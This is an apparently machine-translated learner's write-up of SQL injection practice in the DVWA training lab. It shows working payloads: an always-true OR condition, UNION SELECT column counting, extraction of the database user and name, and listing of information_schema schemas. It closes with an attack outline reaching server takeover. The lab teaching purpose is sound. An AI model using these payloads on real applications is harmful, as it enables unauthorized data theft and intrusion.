SQL injection (DVWA environment)

First sign in to DVWA home page:

1, modify the security level for the low level (first play do not face), in the Dvwa Security page.

2, entered the SQL Injection page, error. (In my mind, this DVWA is the official website is not able to play it.) ）

Web page error Hint:Parse error: syntax error, unexpected ' [' in C:\xampp\htdocs\DVWA\vulnerabilities\sqli\ index.php on line

Hurriedly open index.php file, this prompt error 65 line look PHP code! (I am not willing to, I am learning Java)

$num = Mysqli_fetch_row ($result) [0];

----> Guess put back type is not an array, it will [0] get rid of the test is OK =. = (left to PHP's friends to see the specific bar, first use)

3, a wonderful experience after the first attempt to start the SQL injection.

Based on the above prompts, enter the user's ID, which will return information about this user. Here we first enter "1" to try.

When the data is returned successfully, the URL of the address bar of the browser is found :

http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

Changing the input value of 2 turns into:

http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=2&submit=submit#

Enter single quote ' Try, find page error:

You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-to-use "at line 1

Because the user entered the value of the ID, so we are accustomed to judge the injection type here is a number of glyphs, so try to enter: 1 or 1=1, see if you can query:

And the Address bar is http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1+or+1%3D1&Submit=Submit#

So guess the daemon will use this value as a character type, and then input: 1 ' or ' 1 ' = ' 1, the result successfully returned multiple rows of data: (very excited to say)

From the Owasp Test Guide (http://www.owasp.org.cn/owasp-project/download/OWASP_testing_guide), there are

Union queries SQL injection, blind SQL injection, SUBSTRING (text,start,length), and pre-program injection.

Next analyze the number of fields: there are two ways

Method One: Use the order Bynum statement.
The reason for analyzing the number of fields is that we later need to use the Union SELECT statement to get the sensitive data we need. according to order by knowledge,

If the number that follows is beyond the number of fields, an error will be made! With this we can determine the number of fields.

, so the number of fields is 2

Method Two: Use union select directly to guess the number of fields.
Because when the number of fields does not correspond, it will also occur error!
1 ' Union Select #-------Error The used SELECT statements has a different number of columns
1 ' Union Select 1,2#-------Normal, so the number of fields is 2

Use UNION ALL in conjunction with three built-in functions such as user (), and Database (), version (). Get Connected Database account information, database name, database version information.

1 ' and 1=2 Union Select User (), database () #------successfully obtained the information of databases!!!

Use UNION ALL in conjunction with MySQL's default database Infromation_scehma, which stores information about all MySQL databases and tables.

1 ' and 1=2 Union select 1,schema_name from information_schema.schemata#---------(horrible ~)

Summarize the first experience of SQL injection today: The general idea is as follows

1, to find the injection point, should be able to be achieved through the Web scanning tool.

2, through the injection point, try to get the connection database user name, database name, connection database user rights, operating system information, database version and other related information.

3. Guess key database tables and their important fields and contents (common information such as the table name and field name of the Administrator account)

4, can be obtained through the user information, to find the background login portal.

5, use the background to learn further information, power, until the server to get permissions.

Thank you very much for Yumbo's share of the Lord: http://blog.csdn.net/qq_20745827/article/details/68944753

SQL injection (DVWA environment)